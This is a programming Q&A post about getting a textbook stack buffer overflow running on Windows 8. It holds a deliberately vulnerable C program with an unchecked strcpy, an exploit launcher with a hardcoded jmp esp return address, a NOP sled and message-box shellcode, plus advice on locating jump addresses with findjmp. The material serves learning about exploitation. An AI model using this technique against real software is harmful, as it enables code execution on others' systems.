# "Simple" buffer overflow in Windows 8

Tags: c, buffer, buffer-overflow, shellcode

I'm trying to create two simple programs in C to simulate a buffer overflow:

1. first one accepts an input and copies it to the memmory
2. second one
   abuses the first one to execute some shellcode that displays a
   textbox on windows 8.

I found an [old tutorial](https://www.exploit-db.com/papers/13044/) that gives you two programs to do something simular, but I have some difficulties to get it to work under Windows 8 64-bit.
I'm using Visual Studio 2013 to compile the code.

The first code snippet seems pretty straightforward, and works:

```
#include <stdio.h>
#include <stdlib.h>

int foo(char *);

int main(int argc, char *argv[])
{
  if(argc != 2)
    return printf("Supply an argument, dude\n");
  foo(argv[1]); 
  return 0;
}

int foo(char *input)
{
  unsigned char buffer[600]="";
  printf("%.8X\n", &buffer);
  strcpy(buffer, input);
  return 0;
}
```

The second code probably needs some edits, but here is where I get stuck:

```
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET 0x7935EDBB   /* ATTENTION!!! Change it. Search kernel32.dll
                           or any other library for jmp esp or call esp 
                           instruction and then save the address */
#define TRASH 0x41

char shellcode[]=
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";

int main(int argc, char *argv[])
{
  char *bufExe[3];
  char buf[700];
  int i;
  char *ptr = buf;

  memset(buf, 0, sizeof(buf));
  bufExe[0] = "vuln.exe";
  bufExe[2] = NULL;

  for(i=0;i<620;i++)
    (*ptr++) = TRASH;                     //620 bytes of chunk

  *(unsigned long *)&buf[620] = RET;   //then return address = jmp esp, call esp
  strcat(buf, "\x90\x90\x90\x90");     //small NOP sledge
  strcat(buf, shellcode);              //and our first shellcode
  bufExe[1] = buf;
  execve(bufExe[0],bufExe,NULL);    
  return 0;
}
```

Two things I think definitely needs to be changed are: `#define RET 0x7935EDBB` and perhaps the shellcode.

Anybody any ideas to get this to work?

Comment: Can you describe more about what you're seeing / expecting to see that you're not? It's hard to help you if you're only saying, "I'm stuck." Also, what is *vuln.exe*? Is that the first code snipped from above?

Comment: Also, it's called a "NOP Sled", not a "NOP Sledge"

Comment: You should also be passing a NULL terminated list of environment variables when you call *execve*. That's the external variable `environ` from libc

Comment: So you are expecting _undefined behaviour_ to behave in a defined way?

Comment: The shellcode is basically compiled code and is platform dependent. If this shellcode is 32-bit, it won't work on a 64-bit environment. You have to compile your code for 32-bits.

Comment: @Decave: thank you for your response. Vuln.exe is indeed the first code snippet. I don't get any compile errors, however, when running I don't see anything happen, I'm expecting to see a messagebox. Is environ called by adding extern char **environ?

Comment: @user3231622 yes, that is how you reference `environ`. As far as the code not working, I'm sorry but "I don't see anything happen" is also just not enough to go on. I recommend learning how to use `gdb` and stepping through the assembly instructions to see where your instructions are in memory and verify that everything's happening like you'd expect. There are a million reasons that this could not be working, and without more information it's difficult to help you.

Comment: @Decave do you mind trying to explain me how you find the correct adress for RET? (see code) cause I think this one might be incorrect too

Answer (score 0):

Seems like the RET address might be incorrect.
To find the correct address for RET, use [findjmp](http://www.securiteam.com/tools/5LP0C1PEUY.html) (from Ryan Permeh).
Compile findjmp.c and run with the following parameters :

```
findjmp <DLLfile> <register>.  Suppose you want to look for jumps to esp in kernel32.dll, run  “findjmp kernel32.dll esp”
On Vista SP2, you should get something like this :
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning kernel32.dll for code useable with the esp register
0x773AF74B      call esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 1 usable addresses
```